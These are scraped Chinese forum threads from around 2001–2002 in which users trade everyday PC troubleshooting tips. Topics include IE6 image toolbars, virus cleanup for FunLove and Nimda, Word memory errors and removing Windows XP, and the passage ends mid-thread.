 发表于 2001-11-13 15:51:12 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
poorfish在上个帖子中说
引用:
取消图片工具栏还有一个方法
图片上出现图片工具栏后，在工具栏上点右键，看到“禁用图片工具栏“了没有

让我想到，是不是可以在internet选项的高级设置里禁止？（我没有ie6.0，试不了）

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-11-13 15:55:49 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
darkvn在上个帖子中说
引用:
poorfish在上个帖子中说
引用:
取消图片工具栏还有一个方法
图片上出现图片工具栏后，在工具栏上点右键，看到“禁用图片工具栏“了没有

让我想到，是不是可以在internet选项的高级设置里禁止？（我没有ie6.0，试不了）

我上面不是写了么！！！

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-13 15:58:56 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
POPOEVER在上个帖子中说
引用:
darkvn在上个帖子中说
引用:
poorfish在上个帖子中说
引用:
取消图片工具栏还有一个方法
图片上出现图片工具栏后，在工具栏上点右键，看到“禁用图片工具栏“了没有

让我想到，是不是可以在internet选项的高级设置里禁止？（我没有ie6.0，试不了）

我上面不是写了么！！！

昨晚一通宵没睡，今天眼睛比较花，迷糊的的很...呵呵，实在不好意思。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-11-13 16:01:03 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
上次偶无意中在注册表中发现这其实是个htc文件

说不定还可以进行修改

| 收藏贴 |
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-13 16:03:40 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
色眯眯的小疯狗在上个帖子中说
引用:
上次偶无意中在注册表中发现这其实是个htc文件

说不定还可以进行修改

新发现，能具体说说吗？这个htc是如何工作的。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
mingox

超级用户
积分：412
发帖：121
来自：深圳
注册：2001-07-10
 发表于 2001-11-13 16:12:02 按此观看mingox的个人资料 按此发邮件给mingox 访问mingox的主页 mingox 的 oicq 是324188,查看 324188 的资料 发送悄悄话给mingox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mingox的IP
捡到了，我觉得禁掉更好........

我们在这里：MX根据地[img]http://www.mingox.com/bbs/img/code4life.gif[/img]
色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-11-13 16:14:41 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
我只看到了注册键中有个名为autoimageresize.htc的文件

然后我搜索过整个硬盘，发现这个文件是包含在iepeers.dll之中

具体怎么修改及工作方法，我也不是很清楚

| 收藏贴 |
色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-11-13 16:25:52 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
找到源文件了

用16进制编辑器直接从iepeers.dll copy一下就可以了

[这消息被色眯眯的小疯狗编辑过(编辑时间2001-11-13 16:25:21)]

| 收藏贴 |
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-11-13 18:10:58 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
讨论到这，本贴放DW版好代像不太合适了，转

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

上一贴 | 下一贴
快速回复 | 主题：共享一个IE6小技巧~~~
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于IE6的新麻烦

计算机技术
关于IE6的新麻烦

上一贴 | 下一贴
发表人 主题: 关于IE6的新麻烦
马达

初级用户
积分：113
发帖：166
来自：
注册：2001-09-26
 发表于 2001-11-05 18:04:19 按此观看马达的个人资料 按此发邮件给马达 马达 的 oicq 是5712369,查看 5712369 的资料 收藏该主题供以后查看 发送悄悄话给马达 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看马达的IP
IE6对页面图片的处理多了五种武器，前四种表现为当鼠标悬停在一张图片上时，图片的左上角多了四个按钮，分别是：保存、打印、发送、打开图片收藏。前四种的属性成阴性，倒没什么问题，关键在于第五项——一个隐藏的BOSS，堪称图片浏览杀手。属性阳。

每当一张图片的大小超出显示器显示范围时，IE6会自动缩小图片到全屏，算是先来一个全屏预览，要看到完整的大图，非得悬停鼠标二到三秒，右下出现一缩放按钮，点击才能正式浏览。

应该有选项可以把这个多余的多余功能关掉，找了半天没有找到。
有谁知道解决之道？

半调子

=]Blueidea[=Y. 5.56mm

ximoo

我就是醒目
积分：1884
发帖：2461
来自：火星
注册：2001-09-05
 发表于 2001-11-05 18:12:49 按此观看ximoo的个人资料 按此发邮件给ximoo 访问ximoo的主页 ximoo 的 oicq 是496549,查看 496549 的资料 发送悄悄话给ximoo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ximoo的IP
工具》internet工具》高级里有~！

找找看

-|ximoo.com|-

经典CS服务器地址及状态查看 | CS反作弊客户端下载
马达

初级用户
积分：113
发帖：166
来自：
注册：2001-09-26
 发表于 2001-11-05 18:40:27 按此观看马达的个人资料 按此发邮件给马达 马达 的 oicq 是5712369,查看 5712369 的资料 发送悄悄话给马达 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看马达的IP
找着了；]
原先找过，不敢肯定是不是在这里面，没仔细没找出来。

半调子

=]Blueidea[=Y. 5.56mm

软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-06 16:45:35 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
IE6又烂有不好用,而且还不能删除

^^
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-06 18:58:20 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
可以删除啊，回复到以前的5.5或者5.0版本。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
上一贴 | 下一贴
快速回复 | 主题：关于IE6的新麻烦
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


IE的“清除历史记录”变灰了，不能用了，怎么办？

计算机技术
IE的“清除历史记录”变灰了，不能用了，怎么办？

上一贴 | 下一贴
发表人 | 主题: IE的“清除历史记录”变灰了，不能用了，怎么办？
bjSun 初级用户 积分：69 发帖：31 来自：中国北京 注册：2001-09-14 | 发表于 2001-11-09 15:02:54 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP IE的“清除历史记录”变灰了，不能用了，怎么办？ Sun
blueonline Blueonline 积分：815 发帖：1676 来自：blue-online. 注册：2000-12-09 | 发表于 2001-11-09 15:59:41 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP 在HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel下有没有一个名为links的DWORD，有的话删掉 流自己的汗，吃自己的饭，靠天、靠地不如自己干。 :::::::bLUE-oNlINE.nET || vERSION 2001 ───────
上一贴 | 下一贴
快速回复 | 主题：IE的“清除历史记录”变灰了，不能用了，怎么办？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


WIN32.FUNLOVE.4608是什么病毒?

计算机技术
WIN32.FUNLOVE.4608是什么病毒?

上一贴 | 下一贴
发表人 主题: WIN32.FUNLOVE.4608是什么病毒?
radiohead

高级用户
积分：185
发帖：320
来自：
注册：2000-08-28
 发表于 2001-12-05 15:42:07 按此观看radiohead的个人资料 按此发邮件给radiohead 访问radiohead的主页 radiohead 的 oicq 是14988363,查看 14988363 的资料 收藏该主题供以后查看 发送悄悄话给radiohead 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看radiohead的IP
我用金山毒霸杀不干净~~~有的杀完就得重新装机~~~
怎么处理呢?

签名内不要带有红烧肉，注意，你已经很胖了。谢谢合作------[经典大妈留字]
=blueidea=**radiohead**
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-05 16:07:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
dos下面杀毒 ---->用干净的启动盘启动后-->在dos下面杀

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

搜图客

网事如疯
积分：825
发帖：419
来自：长沙
注册：2000-06-26
 发表于 2001-12-05 16:52:41 按此观看搜图客的个人资料 按此发邮件给搜图客 访问搜图客的主页 搜图客 的 oicq 是282083,查看 282083 的资料 发送悄悄话给搜图客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看搜图客的IP
radiohead在上个帖子中说
引用:
我用金山毒霸杀不干净~~~有的杀完就得重新装机~~~
怎么处理呢?

这个病毒和尼姆达一样可以通过局域网传播，杀毒时请注意。

Blueidea Web Team.
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-05 18:49:02 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
是欢爱系列病毒的一种，在dos下可以杀清的！发作时使系统变慢

WINDFLASH
::浅紫色FORUM::
radiohead

高级用户
积分：185
发帖：320
来自：
注册：2000-08-28
 发表于 2001-12-05 21:26:57 按此观看radiohead的个人资料 按此发邮件给radiohead 访问radiohead的主页 radiohead 的 oicq 是14988363,查看 14988363 的资料 发送悄悄话给radiohead 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看radiohead的IP
谢谢楼上的两位朋友!!
给朋友装CS(反恐)的时候发现的~~~装上以后不运行~~~~显示一个文件被病毒破坏
用KV3000杀不干净~~~在DOS下~~
怎么办?

[这消息被radiohead编辑过(编辑时间2001-12-05 21:26:42)]

签名内不要带有红烧肉，注意，你已经很胖了。谢谢合作------[经典大妈留字]
=blueidea=**radiohead**
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-07 20:50:13 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
升级你的kv3000版本，在dos可以搞定的

WINDFLASH
::浅紫色FORUM::
lzrone

初级用户
积分：107
发帖：51
来自：
注册：2001-03-18
 发表于 2001-12-08 01:37:54 按此观看lzrone的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给lzrone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lzrone的IP
强烈建议不要在局域网内开完全共享
这种病毒传播很快
用干净的dos启动盘来杀毒（我是用金山2001杀的）

****************************
星空依旧灿烂
上一贴 | 下一贴
快速回复 | 主题：WIN32.FUNLOVE.4608是什么病毒?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


紧急！W32.Nimda.E@mm ！！！

计算机技术
紧急！W32.Nimda.E@mm ！！！

上一贴 | 下一贴
发表人 | 主题: 紧急！W32.Nimda.E@mm ！！！
互动引擎 高级用户 积分：294 发帖：236 来自：互动国际 注册：2000-09-08 | 发表于 2001-11-28 14:33:31 按此观看互动引擎的个人资料 按此发邮件给互动引擎 访问互动引擎的主页 互动引擎 的 oicq 是5370757,查看 5370757 的资料 收藏该主题供以后查看 发送悄悄话给互动引擎 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看互动引擎的IP 我的网站感染了W32.Nimda.E@mm病毒，访问时会自动提示是否下载一个samle.exe!!??? 哪位有办法解决？ http://www.itsworld.net iWorld | 互动国际 iPower.iEngine
CrazyParty 群山之巅 积分：2164 发帖：811 来自：温州 注册：2000-10-14 | 发表于 2001-11-28 16:05:42 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP 去金山毒霸的网站看看。 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-28 16:23:08 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 通知你的服务器管理商~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
互动引擎 高级用户 积分：294 发帖：236 来自：互动国际 注册：2000-09-08 | 发表于 2001-11-29 10:58:00 按此观看互动引擎的个人资料 按此发邮件给互动引擎 访问互动引擎的主页 互动引擎 的 oicq 是5370757,查看 5370757 的资料 发送悄悄话给互动引擎 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看互动引擎的IP 问题已经解决了！ 我用的Symantec东东搞定了 iWorld | 互动国际 iPower.iEngine
上一贴 | 下一贴
快速回复 | 主题：紧急！W32.Nimda.E@mm ！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


[color=0000FF]word中的问题[/color]

计算机技术
[color=0000FF]word中的问题[/color]

上一贴 | 下一贴
发表人 主题: [color=0000FF]word中的问题[/color]
珊瑚1

初级用户
积分：48
发帖：21
来自：福建
注册：2001-11-03
 发表于 2001-11-27 19:48:58 按此观看珊瑚1的个人资料 按此发邮件给珊瑚1 珊瑚1 的 oicq 是84974755,查看 84974755 的资料 收藏该主题供以后查看 发送悄悄话给珊瑚1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚1的IP
不知为什么，在打开WORD后，点击工具栏的打开按扭时，弹出一提示框：WORD内存不够，是否把文档1保存为挽救文档？或是在编缉完文档点击保存按扭时提示内存不足，不能实现文档保存操作。

年龄不小才发现自己是只嫩鸟，555.........，希望大家多多支持！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 20:19:36 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
color=#0000FF

[这消息被yunbin编辑过(编辑时间2001-11-27 20:19:07)]
[这消息被yunbin编辑过(编辑时间2001-11-27 20:19:28)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

浸食·花葬

极度色郎
积分：7374
发帖：2638
来自：|翅膀|
注册：2001-07-09
 发表于 2001-11-27 20:26:37 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
yunbin在上个帖子中说
引用:
color=#0000FF

这是什么回答 ？？？？？？？？

||||||||||||||||||||||||||||||||||||||||||||||||

先退出部分其他程序 再保存 ·················

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 20:30:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
浸食·花葬在上个帖子中说
引用:
yunbin在上个帖子中说
引用:
color=#0000FF

这是什么回答 ？？？？？？？？

||||||||||||||||||||||||||||||||||||||||||||||||

先退出部分其他程序 再保存 ·················

昏倒~ 我纠正他的标题中的 color=0000FF中的错误~ 后忽视了正文~

标题中用ubb语法是无效的~

[这消息被yunbin编辑过(编辑时间2001-11-27 20:31:05)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

珊瑚1

初级用户
积分：48
发帖：21
来自：福建
注册：2001-11-03
 发表于 2001-11-27 21:08:48 按此观看珊瑚1的个人资料 按此发邮件给珊瑚1 珊瑚1 的 oicq 是84974755,查看 84974755 的资料 发送悄悄话给珊瑚1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚1的IP
没有开其它任何程序也会这样,唉!顶不住了啊,各位侠想想办法吧!!

先退出部分其他程序 再保存 ················· [/quote]

年龄不小才发现自己是只嫩鸟，555.........，希望大家多多支持！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 21:23:53 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
珊瑚1在上个帖子中说
引用:
没有开其它任何程序也会这样,唉!顶不住了啊,各位侠想想办法吧!!

先退出部分其他程序 再保存 ·················

[/quote]

查毒去~ 可能有一大堆~ 不然重装office word自身程序出错了通常没有多少办法~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

珊瑚1

初级用户
积分：48
发帖：21
来自：福建
注册：2001-11-03
 发表于 2001-11-28 12:19:20 按此观看珊瑚1的个人资料 按此发邮件给珊瑚1 珊瑚1 的 oicq 是84974755,查看 84974755 的资料 发送悄悄话给珊瑚1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚1的IP
yunbin在上个帖子中说

查毒去~ 可能有一大堆~ 不然重装office word自身程序出错了通常没有多少办法~ [/quote]

原来还是尼姆达LE的祸，中了尼姆达的机子在彻底杀毒后会倒至系统文件riched20.dll丢失，倒至WORD不能正常使用。（我是用瑞星杀的毒）

年龄不小才发现自己是只嫩鸟，555.........，希望大家多多支持！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-28 12:22:18 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
珊瑚1在上个帖子中说
引用:
yunbin在上个帖子中说

查毒去~ 可能有一大堆~ 不然重装office word自身程序出错了通常没有多少办法~

原来还是尼姆达LE的祸，中了尼姆达的机子在彻底杀毒后会倒至系统文件riched20.dll丢失，倒至WORD不能正常使用。（我是用瑞星杀的毒） [image] [/quote]

搞定就好~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：[color=0000FF]word中的问题[/color]
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎么样才可以完全的删掉win xp??

计算机技术
怎么样才可以完全的删掉win xp??

上一贴 | 下一贴
发表人 主题: 怎么样才可以完全的删掉win xp??
蓝极

我的家
积分：1252
发帖：775
来自：失落城市
注册：2001-02-01
 发表于 2001-12-14 14:33:11 按此观看蓝极的个人资料 按此发邮件给蓝极 蓝极 的 oicq 是456874,查看 456874 的资料 收藏该主题供以后查看 发送悄悄话给蓝极 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝极的IP
怎么样才可以完全的删掉win xp??
装了以后！计算机慢的要死！有几个问题：

1 在xp下！我的猫用不了！驱动程序重装也不行！但测试却是一切正常！而且拨号后电话线还是有反应的！但就是总是最后提示打不开端口！

2 xp下做的文件！拿回98下仍会发生文件大写的问题！！！？？？

3 如何完全删除xp呢？这个最重要！谢谢……

我随风飘……
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-14 17:30:35 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
Format C:

等我想想再签
jet

我心飞翔
现任版主
积分：5452
发帖：1681
来自：Xi`an
注册：2000-06-18
 发表于 2001-12-14 17:32:22 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP
1 这个问题我也遇到过，但是我用的是实达的modem，我给他们写了封信，他们很快给了我xp下的驱动，你也可以找找xp下的驱动

2 win32系统不区分大小写，无所谓

3 format .....

Add Web To Life

Blueidea Web Team.
Moderator Of Dreamweaver Forum

长的很有创意，活的很有勇气

软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-14 23:32:33 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
格式化拉！~~~~~~~

^^
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-15 12:41:05 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
jet在上个帖子中说
引用:
1 这个问题我也遇到过，但是我用的是实达的modem，我给他们写了封信，他们很快给了我xp下的驱动，你也可以找找xp下的驱动

2 win32系统不区分大小写，无所谓

3 format .....

是不是在网上找xp下的驱动程序啊？？还有啊，我的打印机也用不到了，应该怎办啊？

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-12-15 23:33:39 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
删除的话就是format算了，因为总归是要装新的。
不能用设备，最好是找for xp的驱动。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
cfluodongyu2

初级用户
积分：127
发帖：32
来自：
注册：2002-05-18
 发表于 2002-05-25 17:30:26 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
下次记得用克隆软件,这样会方便多了,最好是装完系统后就做这个工作,不要装驱动.....

好的交流能使我们走近完美！
cfluodongyu2

初级用户
积分：127
发帖：32
来自：
注册：2002-05-18
 发表于 2002-05-25 17:32:46 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
下次记得用克隆软件,这样会方便多了,最好是装完系统后就做这个工作,不要装驱动.....

好的交流能使我们走近完美！
上一贴 | 下一贴
快速回复 | 主题：怎么样才可以完全的删掉win xp??
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


HELP

计算机技术
HELP

上一贴 | 下一贴
发表人 主题: HELP
donger

SmallOgre
积分：5913
发帖：3342
来自：
注册：2000-07-22
 发表于 2001-11-24 23:47:24 按此观看donger的个人资料 按此发邮件给donger 访问donger的主页 收藏该主题供以后查看 发送悄悄话给donger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看donger的IP
我有一朋友中了TASKSVR32.EXE病毒/木马，没法解决（查得出杀不掉）

--寻求不用格C盘的解决方案

Enough is as good as a feast.

Blueidea Web Team

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
